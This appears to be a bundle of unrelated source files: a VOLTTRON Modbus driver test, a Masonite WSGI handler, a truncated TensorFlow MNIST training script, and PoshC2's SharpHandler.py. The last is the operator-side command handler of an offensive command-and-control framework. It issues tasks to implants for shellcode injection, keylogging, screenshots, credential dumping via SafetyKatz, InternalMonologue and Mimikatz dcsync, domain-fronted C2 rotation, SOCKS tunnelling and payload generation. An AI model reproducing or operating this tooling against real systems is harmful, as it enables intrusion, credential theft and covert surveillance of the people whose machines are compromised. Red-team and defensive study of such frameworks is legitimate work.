"ACCUMULATED APPARENT ENERGY PHASE A IMPORT (kVAh)": 27.0,
"ACCUMULATED APPARENT ENERGY PHASE B IMPORT (kVAh)": 26.0,
"ACCUMULATED APPARENT ENERGY PHASE C IMPORT (kVAh)": 25.0,
"ACCUMULATED APPARENT ENERGY PHASE A EXPORT (kVAh)": 24.0,
"ACCUMULATED APPARENT ENERGY PHASE B EXPORT (kVAh)": 23.0,
"ACCUMULATED APPARENT ENERGY PHASE C EXPORT (kVAh)": 22.0,
"REAL POWER PHASE A (kW)": 21.0,
"REAL POWER PHASE B (kW)": 20.0,
"REAL POWER PHASE C (kW)": 19.0,
"REACTIVE POWER PHASE A (kVAR)": 18.0,
"REACTIVE POWER PHASE B (kVAR)": 17.0,
"REACTIVE POWER PHASE C (kVAR)": 16.0,
"APPARENT POWER PHASE A (kVA)": 15.0,
"APPARENT POWER PHASE B (kVA)": 14.0,
"APPARENT POWER PHASE C (kVA)": 13.0,
"POWER FACTOR PHASE A (-)": 12.0,
"POWER FACTOR PHASE B (-)": 11.0,
"POWER FACTOR PHASE C (-)": 10.0,
"VOLTAGE PHASE A-B (V)": 9.0,
"VOLTAGE PHASE B-C (V)": 8.0,
"VOLTAGE PHASE A-C (V)": 7.0,
"VOLTAGE PHASE A-N (V)": 6.0,
"VOLTAGE PHASE B-N (V)": 5.0,
"VOLTAGE PHASE C-N (V)": 4.0,
"CURRENT PHASE A (A)": 3.0,
"CURRENT PHASE B (A)": 2.0,
"CURRENT PHASE C (A)": 1.0}
@pytest.fixture(scope="module")
def agent(request, volttron_instance):
"""
Build PlatformDriverAgent, add modbus driver & csv configurations
"""
# Build platform driver agent
md_agent = volttron_instance.build_agent(identity="test_md_agent")
capabilities = {'edit_config_store': {'identity': PLATFORM_DRIVER}}
volttron_instance.add_capabilities(md_agent.core.publickey, capabilities)
# Clean out platform driver configurations
# wait for it to return before adding new config
md_agent.vip.rpc.call('config.store',
'manage_delete_store',
PLATFORM_DRIVER).get()
# Add driver configurations
md_agent.vip.rpc.call('config.store',
'manage_store',
PLATFORM_DRIVER,
'devices/modbus_tk',
jsonapi.dumps(DRIVER_CONFIG),
config_type='json')
# Add csv configurations
md_agent.vip.rpc.call('config.store',
'manage_store',
PLATFORM_DRIVER,
'modbus_tk.csv',
REGISTRY_CONFIG_STRING,
config_type='csv')
md_agent.vip.rpc.call('config.store',
'manage_store',
PLATFORM_DRIVER,
'modbus_tk_map.csv',
REGISTER_MAP,
config_type='csv')
platform_uuid = volttron_instance.install_agent(
agent_dir=get_services_core("PlatformDriverAgent"),
config_file={},
start=True)
gevent.sleep(10) # wait for the agent to start and start the devices
def stop():
"""
Stop platform driver agent
"""
volttron_instance.stop_agent(platform_uuid)
md_agent.core.stop()
request.addfinalizer(stop)
return md_agent
@pytest.fixture(scope='class')
def modbus_server(request):
modbus_client = Catalog()['battery_meter'].get_class()
server_process = Server(address=IP, port=PORT)
server_process.define_slave(1, modbus_client, unsigned=False)
server_process.start()
time.sleep(1)
yield server_process
time.sleep(1)
server_process.stop()
@pytest.mark.usefixtures("modbus_server")
class TestModbusTKDriver:
"""
Regression tests for the modbus_tk driver interface.
"""
def get_point(self, agent, device_name, point_name):
"""
Issue a get_point RPC call for the named point and return the result.
@param agent: The test Agent.
@param device_name: The driver name, by default: 'devices/device_name'.
@param point_name: The name of the point to query.
@return: The actual reading value of the point name from the RPC call.
"""
return agent.vip.rpc.call(PLATFORM_DRIVER, 'get_point', device_name,
point_name).get(timeout=10)
def set_point(self, agent, device_name, point_name, point_value):
"""
Issue a set_point RPC call for the named point and value, and return the
result.
@param agent: The test Agent.
@param device_name: The driver name, by default: 'devices/device_name'.
@param point_name: The name of the point to query.
@param point_value: The value to set on the point.
@return:The actual reading value of the point name from the RPC call.
"""
return agent.vip.rpc.call(PLATFORM_DRIVER, 'set_point', device_name,
point_name, point_value).get(timeout=10)
def scrape_all(self, agent, device_name):
"""
Issue a get_point RPC call for the device and return the result.
@param agent: The test Agent.
@param device_name: The driver name, by default: 'devices/device_name'.
@return: The dictionary mapping point names to their actual values from
the RPC call.
"""
return agent.vip.rpc.call(PLATFORM_DRIVER, 'scrape_all', device_name)\
.get(timeout=10)
def test_scrape_all(self, agent):
for key in registers_dict.keys():
self.set_point(agent, 'modbus_tk', key, registers_dict[key])
assert self.get_point(agent, 'modbus_tk', key) == \
registers_dict[key]
assert type(self.scrape_all(agent, 'modbus_tk')) is dict
|
src/masonite/foundation/response_handler.py | cercos/masonite | 1,816 | 12746222 | <reponame>cercos/masonite
def response_handler(environ, start_response):
"""The WSGI Application Server.
Arguments:
environ {dict} -- The WSGI environ dictionary
start_response {WSGI callable}
Returns:
WSGI Response
"""
from wsgi import application
application.bind("environ", environ)
"""Add Environ To Service Container
Add the environ to the service container. The environ is generated by the
the WSGI server above and used by a service provider to manipulate the
incoming requests
"""
# """Execute All Service Providers That Require The WSGI Server
# Run all service provider boot methods if the wsgi attribute is true.
# """
try:
for provider in application.get_providers():
application.resolve(provider.boot)
except Exception as e:
application.make("exception_handler").handle(e)
"""We Are Ready For Launch
If we have a solid response and not redirecting then we need to return
a 200 status code along with the data. If we don't, then we'll have
to return a 302 redirection to where ever the user would like go
to next.
"""
_, response = application.make("request"), application.make("response")
start_response(
response.get_status_code(),
response.get_headers() + response.cookie_jar.render_response(),
)
"""Final Step
This will take the data variable from the Service Container and return
it to the WSGI server.
"""
return iter([response.get_response_content()])
def testcase_handler(application, environ, start_response, exception_handling=True):
"""The WSGI Application Server.
Arguments:
environ {dict} -- The WSGI environ dictionary
start_response {WSGI callable}
Returns:
WSGI Response
"""
from wsgi import application
application.bind("environ", environ)
"""Add Environ To Service Container
Add the environ to the service container. The environ is generated by the
the WSGI server above and used by a service provider to manipulate the
incoming requests
"""
# """Execute All Service Providers That Require The WSGI Server
# Run all service provider boot methods if the wsgi attribute is true.
# """
try:
for provider in application.get_providers():
application.resolve(provider.boot)
except Exception as e:
if not exception_handling:
raise e
application.make("exception_handler").handle(e)
"""We Are Ready For Launch
If we have a solid response and not redirecting then we need to return
a 200 status code along with the data. If we don't, then we'll have
to return a 302 redirection to where ever the user would like go
to next.
"""
request, response = application.make("request"), application.make("response")
start_response(
response.get_status_code(),
response.get_headers() + response.cookie_jar.render_response(),
)
"""Final Step
This will take the data variable from the Service Container and return
it to the WSGI server.
"""
return (request, response)
|
poshc2/client/command_handlers/SharpHandler.py | nettitude/PoshC2_Python | 237 | 12746223 | <gh_stars>100-1000
import base64, re, traceback, os, string, subprocess
from prompt_toolkit import PromptSession
from prompt_toolkit.history import FileHistory
from prompt_toolkit.auto_suggest import AutoSuggestFromHistory
from prompt_toolkit.styles import Style
from poshc2.client.Alias import cs_alias, cs_replace
from poshc2.Colours import Colours
from poshc2.server.AutoLoads import check_module_loaded, run_autoloads_sharp
from poshc2.client.Help import sharp_help, allhelp
from poshc2.server.Config import PoshInstallDirectory, PoshProjectDirectory, SocksHost, PayloadsDirectory, ModulesDirectory
from poshc2.server.Config import PayloadCommsHost, DomainFrontHeader, UserAgent, PBindPipeName, PBindSecret, FCommFileName
from poshc2.Utils import argp, load_file, gen_key, get_first_url, get_first_dfheader
from poshc2.server.Core import print_bad, print_good
from poshc2.client.cli.CommandPromptCompleter import FilePathCompleter
from poshc2.server.payloads.Payloads import Payloads
from poshc2.server.PowerStatus import getpowerstatus
from poshc2.server.database.DB import hide_implant, new_task, kill_implant, get_implantdetails, get_sharpurls, get_baseenckey, get_powerstatusbyrandomuri
from poshc2.server.database.DB import select_item, update_label, get_allurls, get_c2server_all, get_newimplanturl, new_urldetails
def handle_sharp_command(command, user, randomuri, implant_id):
# alias mapping
for alias in cs_alias:
if alias[0] == command[:len(command.rstrip())]:
command = alias[1]
# alias replace
for alias in cs_replace:
if command.startswith(alias[0]):
command = command.replace(alias[0], alias[1])
original_command = command
command = command.strip()
run_autoloads_sharp(command, randomuri, user)
if command.startswith("searchhelp"):
do_searchhelp(user, command, randomuri)
return
elif command.startswith("searchallhelp"):
do_searchallhelp(user, command, randomuri)
return
elif command.startswith("searchhistory"):
do_searchhistory(user, command, randomuri)
return
elif command.startswith("upload-file"):
do_upload_file(user, command, randomuri)
return
elif command.startswith("inject-shellcode"):
do_inject_shellcode(user, command, randomuri)
return
elif command.startswith("migrate"):
do_migrate(user, command, randomuri)
return
elif command == "kill-process":
do_kill_process(user, command, randomuri)
return
elif command == "kill-implant" or command == "exit":
do_kill_implant(user, command, randomuri)
return
elif command.startswith("sharpsocks"):
do_sharpsocks(user, command, randomuri)
return
elif (command.startswith("stop-keystrokes")):
do_stop_keystrokes(user, command, randomuri)
return
elif (command.startswith("start-keystrokes")):
do_start_keystrokes(user, command, randomuri)
return
elif (command.startswith("get-keystrokes")):
do_get_keystrokes(user, command, randomuri)
return
elif (command.startswith("get-screenshotmulti")):
do_get_screenshotmulti(user, command, randomuri)
return
elif command.startswith("get-screenshot"):
do_get_screenshot(user, command, randomuri)
return
elif command == "getpowerstatus":
do_get_powerstatus(user, command, randomuri)
return
elif command == "stoppowerstatus":
do_stoppowerstatus(user, command, randomuri)
return
elif command.startswith("run-exe SharpWMI.Program") and "execute" in command and "payload" not in command:
do_sharpwmi_execute(user, command, randomuri)
return
elif (command.startswith("get-hash")):
do_get_hash(user, command, randomuri)
return
elif (command.startswith("enable-rotation")):
do_rotation(user, command, randomuri)
return
elif (command.startswith("safetykatz")):
do_safetykatz(user, command, randomuri)
return
elif command.startswith("loadmoduleforce"):
do_loadmoduleforce(user, command, randomuri)
return
elif command.startswith("loadmodule"):
do_loadmodule(user, command, randomuri)
return
elif command.startswith("listmodules"):
do_listmodules(user, command, randomuri)
return
elif command.startswith("modulesloaded"):
do_modulesloaded(user, command, randomuri)
return
elif command.startswith("pbind-connect"):
do_pbind_start(user, command, randomuri)
return
elif command.startswith("fcomm-connect"):
do_fcomm_start(user, command, randomuri)
return
elif command.startswith("dynamic-code"):
do_dynamic_code(user, command, randomuri)
return
elif command.startswith("startdaisy"):
do_startdaisy(user, command, randomuri)
return
elif command.startswith("dcsync"):
do_dcsync(user, command, randomuri)
return
elif command == "help":
do_help(user, command, randomuri)
return
else:
if command:
do_shell(user, original_command, randomuri)
return
def do_searchhelp(user, command, randomuri):
searchterm = (command).replace("searchhelp ", "")
helpful = sharp_help.split('\n')
for line in helpful:
if searchterm in line.lower():
print(Colours.GREEN + line)
def do_searchallhelp(user, command, randomuri):
searchterm = (command).replace("searchallhelp ", "")
for line in allhelp:
if searchterm in line.lower():
print(Colours.GREEN + line)
def do_searchhistory(user, command, randomuri):
searchterm = (command).replace("searchhistory ", "")
with open('%s/.implant-history' % PoshProjectDirectory) as hisfile:
for line in hisfile:
if searchterm in line.lower():
print(Colours.GREEN + line.replace("+", ""))
def do_upload_file(user, command, randomuri):
# TODO lots of common code
source = ""
destination = ""
if command == "upload-file":
style = Style.from_dict({
'': '#80d130',
})
session = PromptSession(history=FileHistory('%s/.upload-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
try:
source = session.prompt("Location file to upload: ", completer=FilePathCompleter(PayloadsDirectory, glob="*"))
source = PayloadsDirectory + source
except KeyboardInterrupt:
return
while not os.path.isfile(source):
print("File does not exist: %s" % source)
source = session.prompt("Location file to upload: ", completer=FilePathCompleter(PayloadsDirectory, glob="*"))
source = PayloadsDirectory + source
destination = session.prompt("Location to upload to: ")
else:
args = argp(command)
source = args.source
destination = args.destination
try:
destination = destination.replace("\\", "\\\\")
print("")
print("Uploading %s to %s" % (source, destination))
uploadcommand = f"upload-file {source} {destination}"
new_task(uploadcommand, user, randomuri)
except Exception as e:
print("Error with source file: %s" % e)
traceback.print_exc()
def do_inject_shellcode(user, command, randomuri):
params = re.compile("inject-shellcode", re.IGNORECASE)
params = params.sub("", command)
style = Style.from_dict({
'': '#80d130',
})
session = PromptSession(history=FileHistory('%s/.shellcode-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
try:
path = session.prompt("Location of shellcode file: ", completer=FilePathCompleter(PayloadsDirectory, glob="*.bin"))
path = PayloadsDirectory + path
except KeyboardInterrupt:
return
try:
shellcodefile = load_file(path)
if shellcodefile is not None:
new_task("run-exe Core.Program Core Inject-Shellcode %s%s #%s" % (base64.b64encode(shellcodefile).decode("utf-8"), params, os.path.basename(path)), user, randomuri)
except Exception as e:
print("Error loading file: %s" % e)
def do_migrate(user, command, randomuri):
params = re.compile("migrate", re.IGNORECASE)
params = params.sub("", command)
implant = get_implantdetails(randomuri)
implant_arch = implant.Arch
implant_comms = implant.Pivot
if implant_arch == "AMD64":
arch = "64"
else:
arch = "86"
if implant_comms == "C#":
path = "%sSharp_v4_x%s_Shellcode.bin" % (PayloadsDirectory, arch)
shellcodefile = load_file(path)
elif "Daisy" in implant_comms:
daisyname = input("Name required: ")
path = "%s%sSharp_v4_x%s_Shellcode.bin" % (PayloadsDirectory, daisyname, arch)
shellcodefile = load_file(path)
elif "Proxy" in implant_comms:
path = "%sProxySharp_v4_x%s_Shellcode.bin" % (PayloadsDirectory, arch)
shellcodefile = load_file(path)
new_task("run-exe Core.Program Core Inject-Shellcode %s%s #%s" % (base64.b64encode(shellcodefile).decode("utf-8"), params, os.path.basename(path)), user, randomuri)
def do_kill_process(user, command, randomuri):
impid = get_implantdetails(randomuri)
print_bad("**OPSEC Warning** - kill-process will terminate the entire process, if you want to kill the thread only use kill-implant")
ri = input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid.ImplantID)
if ri.lower() == "n":
print("Implant not terminated")
if ri == "" or ri.lower() == "y":
pid = impid.PID
new_task("kill-process %s" % (pid), user, randomuri)
kill_implant(randomuri)
def do_kill_implant(user, command, randomuri):
impid = get_implantdetails(randomuri)
print_bad("**OPSEC Warning** - kill-implant terminates the current threat not the entire process, if you want to kill the process use kill-process")
ri = input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid.ImplantID)
if ri.lower() == "n":
print("Implant not terminated")
if ri == "" or ri.lower() == "y":
pid = impid.PID
new_task("exit", user, randomuri)
kill_implant(randomuri)
def do_exit(user, command, randomuri):
return do_kill_implant(user, command, randomuri)
def do_sharpsocks(user, command, randomuri):
style = Style.from_dict({
'': '#80d130',
})
from random import choice
channel = "".join(choice(string.ascii_letters) for _ in range(25))
sharp_key = gen_key().decode("utf-8")
default_sharp_urls = get_sharpurls()
urls_prompt = PromptSession(history=FileHistory(f'{PoshProjectDirectory}/.comma-separated-urls-history'), auto_suggest=AutoSuggestFromHistory(), style=style)
socks_proxy_urls = urls_prompt.prompt(f"What URIs would you like to use for SharpSocks? Default is {default_sharp_urls.replace(' ', '')}: ")
if not socks_proxy_urls:
socks_proxy_urls = default_sharp_urls
socks_proxy_urls = socks_proxy_urls.split(",")
if len(socks_proxy_urls) < 2:
print("Please specify at least two URIs")
return
socks_proxy_urls = [i.replace("\"", "").strip() for i in socks_proxy_urls]
socks_proxy_urls = [(i[1:] if i.startswith("/") else i) for i in socks_proxy_urls]
default_sharp_url = select_item("PayloadCommsHost", "C2Server").replace('"', '').split(',')[0]
domains_prompt = PromptSession(history=FileHistory(f'{PoshProjectDirectory}/.protocol-and-domain-history'), auto_suggest=AutoSuggestFromHistory(), style=style)
sharp_url = domains_prompt.prompt(f"What domain would you like to use for SharpSocks? Default is {default_sharp_url}: ")
if not sharp_url:
sharp_url = default_sharp_url
if not sharp_url.startswith("http"):
print("Please specify a protocol (http/https)")
return
default_host_header = get_first_dfheader(select_item("DomainFrontHeader", "C2Server"))
host_headers_prompt = PromptSession(history=FileHistory('%s/.host-headers-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
host_header = host_headers_prompt.prompt(f"What host header should used? Default is {default_host_header}: ")
if not host_header:
host_header = default_host_header
default_user_agent = select_item("UserAgent", "C2Server")
user_agent_prompt = PromptSession(history=FileHistory('%s/.user-agents-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
user_agent = user_agent_prompt.prompt(f"What user agent? Default is \"{default_user_agent}\": ")
if not user_agent:
user_agent = default_user_agent
default_beacon = "200"
beacon_prompt = PromptSession(history=FileHistory('%s/.beacon-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
beacon = beacon_prompt.prompt(f"What beacon interval would you like SharpSocks to use (ms)? Default: {default_beacon}ms: ")
if not beacon:
beacon = default_beacon
if beacon.strip().endswith("ms"):
beacon = beacon.replace("ms", "").strip()
server_command = f"{PoshInstallDirectory}resources/SharpSocks/SharpSocksServer/SharpSocksServer -c={channel} -k={sharp_key} -l={SocksHost} -v"
if " -v" in command or " --verbose" in command:
server_command += " --verbose"
server_command += "\n"
print(Colours.GREEN + "\nOk, run this command from your SharpSocksServer directory to launch the SharpSocks server:\n")
print(server_command)
task = f"run-exe SharpSocksImplant.Program SharpSocksImplant -s {sharp_url} -c {channel} -k {sharp_key} -url1 {socks_proxy_urls[0]} -url2 {socks_proxy_urls[1]} -b {beacon} -r {beacon} --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken --user-agent \"{user_agent}\""
if host_header:
task += f" -df {host_header}"
extra_args = command.replace("sharpsocks ", "").strip()
if extra_args:
task += " " + extra_args
confirm = input("Are you ready to start the SharpSocks in the implant? (Y/n) ")
if confirm == "" or confirm.lower() == "y":
new_task(task, user, randomuri)
else:
print("Aborted...")
return
print("SharpSocks task issued, to stop SharpSocks run stopsocks")
def do_stop_keystrokes(user, command, randomuri):
new_task("run-exe Logger.KeyStrokesClass Logger %s" % command, user, randomuri)
update_label("", randomuri)
def do_start_keystrokes(user, command, randomuri):
check_module_loaded("Logger.exe", randomuri, user)
new_task("run-exe Logger.KeyStrokesClass Logger %s" % command, user, randomuri)
update_label("KEYLOG", randomuri)
def do_get_keystrokes(user, command, randomuri):
new_task("run-exe Logger.KeyStrokesClass Logger %s" % command, user, randomuri)
def do_get_screenshotmulti(user, command, randomuri):
pwrStatus = get_powerstatusbyrandomuri(randomuri)
if (pwrStatus is not None and pwrStatus[7]):
ri = input("[!] Screen is reported as LOCKED, do you still want to attempt a screenshot? (y/N) ")
if ri.lower() == "n" or ri.lower() == "":
return
new_task(command, user, randomuri)
update_label("SCREENSHOT", randomuri)
def do_get_screenshot(user, command, randomuri):
pwrStatus = get_powerstatusbyrandomuri(randomuri)
if (pwrStatus is not None and pwrStatus[7]):
ri = input("[!] Screen is reported as LOCKED, do you still want to attempt a screenshot? (y/N) ")
if ri.lower() == "n" or ri.lower() == "":
return
new_task(command, user, randomuri)
def do_get_powerstatus(user, command, randomuri):
getpowerstatus(randomuri)
new_task("run-dll PwrStatusTracker.PwrFrm PwrStatusTracker GetPowerStatusResult ", user, randomuri)
def do_stoppowerstatus(user, command, randomuri):
new_task(command, user, randomuri)
update_label("", randomuri)
def do_get_hash(user, command, randomuri):
check_module_loaded("InternalMonologue.exe", randomuri, user)
new_task("run-exe InternalMonologue.Program InternalMonologue", user, randomuri)
def do_safetykatz(user, command, randomuri):
new_task("run-exe SafetyKatz.Program %s" % command, user, randomuri)
def do_loadmoduleforce(user, command, randomuri):
params = re.compile("loadmoduleforce ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri, user, force=True)
def do_loadmodule(user, command, randomuri):
params = re.compile("loadmodule ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri, user)
def do_listmodules(user, command, randomuri):
modules = os.listdir(ModulesDirectory)
modules = sorted(modules, key=lambda s: s.lower())
print("")
print("[+] Available modules:")
print("")
for mod in modules:
if (".exe" in mod) or (".dll" in mod):
print(mod)
def do_modulesloaded(user, command, randomuri):
implant_details = get_implantdetails(randomuri)
print(implant_details.ModsLoaded)
new_task("listmodules", user, randomuri)
def do_help(user, command, randomuri):
print(sharp_help)
def do_shell(user, command, randomuri):
new_task(command, user, randomuri)
def do_rotation(user, command, randomuri):
domain = input("Domain or URL in array format: \"https://www.example.com\",\"https://www.example2.com\" ")
domainfront = input("Domain front URL in array format: \"fjdsklfjdskl.cloudfront.net\",\"jobs.azureedge.net\" ")
new_task("dfupdate %s" % domainfront, user, randomuri)
new_task("rotate %s" % domain, user, randomuri)
def do_sharpwmi_execute(user, command, randomuri):
style = Style.from_dict({'': '#80d130'})
session = PromptSession(history=FileHistory('%s/.shellcode-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
try:
path = session.prompt("Location of base64 vbs/js file: ", completer=FilePathCompleter(PayloadsDirectory, glob="*.b64"))
path = PayloadsDirectory + path
except KeyboardInterrupt:
return
if os.path.isfile(path):
with open(path, "r") as p:
payload = p.read()
new_task("%s payload=%s" % (command, payload), user, randomuri)
else:
print_bad("Could not find file")
def do_pbind_start(user, command, randomuri):
key = get_baseenckey()
if len(command.split()) == 2: # 'pbind-connect <hostname>' is two args
command = f"{command} {PBindPipeName} {PBindSecret} {key}"
elif len(command.split()) == 4: # if the pipe name and secret are already present just add the key
command = f"{command} {key}"
else:
print_bad("Expected 'pbind_connect <hostname>' or 'pbind_connect <hostname> <pipename> <secret>'")
return
new_task(command, user, randomuri)
def do_fcomm_start(user, command, randomuri):
key = get_baseenckey()
if len(command.split()) == 1: # 'fcomm-connect' is one args
command = f"{command} {FCommFileName} {key}"
elif len(command.split()) == 2: # if the file name is already there then just add the key
command = f"{command} {key}"
else:
print_bad("Expected 'fcomm_connect' or 'fcomm_connect <filename>'")
return
new_task(command, user, randomuri)
def do_dynamic_code(user, command, randomuri):
compile_command = "mono-csc %sDynamicCode.cs -out:%sPoshC2DynamicCode.exe -target:exe -warn:2 -sdk:4" % (PayloadsDirectory, PayloadsDirectory)
try:
subprocess.check_output(compile_command, shell=True)
except subprocess.CalledProcessError:
return
command = command.replace("dynamic-code", "").strip()
check_module_loaded(f"{PayloadsDirectory}PoshC2DynamicCode.exe", randomuri, user, force=True)
new_task(f"run-exe PoshC2DynamicCode.Program PoshC2DynamicCode {command}", user, randomuri)
def do_startdaisy(user, command, randomuri):
check_module_loaded("daisy.dll", randomuri, user)
elevated = input(Colours.GREEN + "Are you elevated? Y/n " + Colours.END)
domain_front = ""
proxy_user = ""
proxy_pass = ""
proxy_url = ""
cred_expiry = ""
if elevated.lower() == "n":
cont = input(Colours.RED + "Daisy from an unelevated context can only bind to localhost, continue? y/N " + Colours.END)
if cont.lower() == "n" or cont == "":
return
bind_ip = "localhost"
else:
bind_ip = input(Colours.GREEN + "Bind IP on the daisy host: " + Colours.END)
bind_port = input(Colours.GREEN + "Bind Port on the daisy host: " + Colours.END)
firstdaisy = input(Colours.GREEN + "Is this the first daisy in the chain? Y/n? " + Colours.END)
default_url = get_first_url(PayloadCommsHost, DomainFrontHeader)
default_df_header = get_first_dfheader(DomainFrontHeader)
if default_df_header == default_url:
default_df_header = None
if firstdaisy.lower() == "y" or firstdaisy == "":
upstream_url = input(Colours.GREEN + f"C2 URL (leave blank for {default_url}): " + Colours.END)
domain_front = input(Colours.GREEN + f"Domain front header (leave blank for {str(default_df_header)}): " + Colours.END)
proxy_user = input(Colours.GREEN + "Proxy user (<domain>\\<username>, leave blank if none): " + Colours.END)
proxy_pass = input(Colours.GREEN + "Proxy password (leave blank if none): " + Colours.END)
proxy_url = input(Colours.GREEN + "Proxy URL (leave blank if none): " + Colours.END)
cred_expiry = input(Colours.GREEN + "Password/Account Expiration Date: .e.g. 15/03/2018: ")
if not upstream_url:
upstream_url = default_url
if not domain_front:
if default_df_header:
domain_front = default_df_header
else:
domain_front = ""
else:
upstream_daisy_host = input(Colours.GREEN + "Upstream daisy server: " + Colours.END)
upstream_daisy_port = input(Colours.GREEN + "Upstream daisy port: " + Colours.END)
upstream_url = f"http://{upstream_daisy_host}:{upstream_daisy_port}"
domain_front = upstream_daisy_host
urls = get_allurls().replace(" ", "")
useragent = UserAgent
command = f"invoke-daisychain \"{bind_ip}\" \"{bind_port}\" {upstream_url} \"{domain_front}\" \"{proxy_url}\" \"{proxy_user}\" \"{proxy_pass}\" \"{useragent}\" {urls}"
new_task(command, user, randomuri)
update_label("DaisyHost", randomuri)
createpayloads = input(Colours.GREEN + "Would you like to create payloads for this Daisy Server? Y/n ")
if createpayloads.lower() == "y" or createpayloads == "":
name = input(Colours.GREEN + "Enter a payload name: " + Colours.END)
daisyhost = get_implantdetails(randomuri)
proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
C2 = get_c2server_all()
urlId = new_urldetails(name, f"\"http://{bind_ip}:{bind_port}\"", "\"\"", proxy_url, proxy_user, proxy_pass, cred_expiry)
newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, "%s?d" % get_newimplanturl(), PayloadsDirectory, PowerShellProxyCommand=proxynone,
URLID=urlId)
newPayload.PSDropper = (newPayload.PSDropper).replace("$pid;%s" % (upstream_url), "$pid;%s@%s" % (daisyhost.User, daisyhost.Domain))
newPayload.CreateDroppers(name)
newPayload.CreateRaw(name)
newPayload.CreateDlls(name)
newPayload.CreateShellcode(name)
newPayload.CreateDonutShellcode(name)
newPayload.CreateEXE(name)
newPayload.CreateMsbuild(name)
print_good("Created new %s daisy payloads" % name)
def do_dcsync(user, command, randomuri):
params = re.compile("dcsync ", re.IGNORECASE)
params = params.sub("", command)
res = params.split()
domain = res[0]
dcsync_user = res[1]
new_task(f"run-dll SharpSploit.Credentials.Mimikatz SharpSploit Command \"\\\"lsadump::dcsync /domain:{domain} /user:{dcsync_user}\\\"\"", user, randomuri)
|
frameworks/tensorflow/code/train.py | jerrypeng7773/amazon-sagemaker-examples | 2,610 | 12746252 | from __future__ import print_function
import argparse
import gzip
import json
import logging
import os
import traceback
import numpy as np
import tensorflow as tf
from tensorflow.keras import Model
from tensorflow.keras.layers import Conv2D, Dense, Flatten
logging.basicConfig(level=logging.DEBUG)
# Define the model object
class SmallConv(Model):
def __init__(self):
super(SmallConv, self).__init__()
self.conv1 = Conv2D(32, 3, activation="relu")
self.flatten = Flatten()
self.d1 = Dense(128, activation="relu")
self.d2 = Dense(10)
def call(self, x):
x = self.conv1(x)
x = self.flatten(x)
x = self.d1(x)
return self.d2(x)
# Decode and preprocess data
def convert_to_numpy(data_dir, images_file, labels_file):
"""Byte string to numpy arrays"""
with gzip.open(os.path.join(data_dir, images_file), "rb") as f:
images = np.frombuffer(f.read(), np.uint8, offset=16).reshape(-1, 28, 28)
with gzip.open(os.path.join(data_dir, labels_file), "rb") as f:
labels = np.frombuffer(f.read(), np.uint8, offset=8)
return (images, labels)
def mnist_to_numpy(data_dir, train):
"""Load raw MNIST data into numpy array
Args:
data_dir (str): directory of MNIST raw data.
This argument can be accessed via SM_CHANNEL_TRAINING
train (bool): use training data
Returns:
tuple of images and labels as numpy array
"""
if train:
images_file = "train-images-idx3-ubyte.gz"
labels_file = "train-labels-idx1-ubyte.gz"
else:
images_file = "t10k-images-idx3-ubyte.gz"
labels_file = "t10k-labels-idx1-ubyte.gz"
return convert_to_numpy(data_dir, images_file, labels_file)
def normalize(x, axis):
eps = np.finfo(float).eps
mean = np.mean(x, axis=axis, keepdims=True)
# avoid division by zero
std = np.std(x, axis=axis, keepdims=True) + eps
return (x - mean) / std
# Training logic
def train(args):
# create data loader from the train / test channels
x_train, y_train = mnist_to_numpy(data_dir=args.train, train=True)
x_test, y_test = mnist_to_numpy(data_dir=args.test, train=False)
x_train, x_test = x_train.astype(np.float32), x_test.astype(np.float32)
# normalize the inputs to mean 0 and std 1
x_train, x_test = normalize(x_train, (1, 2)), normalize(x_test, (1, 2))
# expand channel axis
# tf uses depth minor convention
x_train, x_test = np.expand_dims(x_train, axis=3), np.expand_dims(x_test, axis=3)
# normalize the data to mean 0 and std 1
train_loader = (
tf.data.Dataset.from_tensor_slices((x_train, y_train))
.shuffle(len(x_train))
.batch(args.batch_size)
)
test_loader = tf.data.Dataset.from_tensor_slices((x_test, y_test)).batch(args.batch_size)
model = SmallConv()
model.compile()
loss_fn = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True)
optimizer = tf.keras.optimizers.Adam(
learning_rate=args.learning_rate, beta_1=args.beta_1, beta_2=args.beta_2
)
train_loss = tf.keras.metrics.Mean(name="train_loss")
train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy(name="train_accuracy")
test_loss = tf.keras.metrics.Mean(name="test_loss")
test_accuracy = tf.keras.metrics.SparseCategoricalAccuracy(name="test_accuracy")
@tf.function
def train_step(images, labels):
with tf.GradientTape() as tape:
predictions = model(images, training=True)
loss = loss_fn(labels, predictions)
grad = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(grad, model.trainable_variables))
train_loss(loss)
train_accuracy(labels, predictions)
return
@tf.function
def test_step(images, labels):
predictions = model(images, training=False)
t_loss = loss_fn(labels, predictions)
test_loss(t_loss)
test_accuracy(labels, predictions)
return
print("Training starts ...")
for epoch in range(args.epochs):
train_loss.reset_states()
train_accuracy.reset_states()
test_loss.reset_states()
test_accuracy.reset_states()
for batch, (images, labels) in enumerate(train_loader):
train_step(images, labels)
for images, labels in test_loader:
test_step(images, labels)
print(
f"Epoch {epoch + 1}, "
f"Loss: {train_loss.result()}, "
f"Accuracy: {train_accuracy.result() * 100}, "
f"Test Loss: {test_loss.result()}, "
f"Test Accuracy: {test_accuracy.result() * 100}"
)
# Save the model
# A version number is needed for the serving container
# to load the model
version = "00000000"
ckpt_dir = os.path.join(args.model_dir, version)
if not os.path.exists(ckpt_dir):
os.makedirs(ckpt_dir)
model.save(ckpt_dir)
return
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("--batch-size", type=int, default=32)
parser.add_argument("--epochs", type=int, default=1)
parser.add_argument("--learning-rate", type=float, default=1e-3)
